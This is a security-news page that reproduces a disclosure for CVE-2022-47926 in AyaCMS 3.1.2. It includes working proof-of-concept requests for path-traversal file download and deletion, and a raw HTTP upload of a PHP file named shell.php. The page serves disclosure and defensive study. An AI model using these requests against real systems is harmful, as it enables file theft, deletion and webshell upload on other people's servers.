Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-47926: AyaCMS v3.1.2 has Arbitrary file operations Vulnerability · Issue #7 · loadream/AyaCMS

AyaCMS 3.1.2 is vulnerable to file deletion via /aya/module/admin/fst_del.inc.php

CVE
#vulnerability#web#mac#windows#apple#intel#php#chrome#webkit

Vulnerability files: /aya/module/admin/fst_down.inc.php, /aya/module/admin/fst_del.inc.php
Vulnerability description: The check_path function has flaws in the filtering of parameters passed in by $file. We only need to enter characters other than “./\” such as aya in the header of the parameter to bypass the detection and download or delete any file in the system.
1、Arbitrary file download Vulnerability

You can access any file in the system through
admin.php?action=fst_down&file=aya/table/…/…/…/…/…/…/windows/win.ini

2、Arbitrary file delete Vulnerability

First I create a file named 111.txt under C:\Windows

Then the files can be deleted through
admin.php?action=fst_del&file=aya/…/…/…/…/…/windows/111.txt&in_ajax=1

3、Arbitrary file upload Vulnerability

POST /upload/admin.php?action=fst_upload&file=aya HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 204
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9HCWsLRL4AuZwHyu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary9HCWsLRL4AuZwHyu
Content-Disposition: form-data; name="upfile"; filename="shell.php"
Content-Type: text/plain

<?php phpinfo(); ?>
------WebKitFormBoundary9HCWsLRL4AuZwHyu--

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907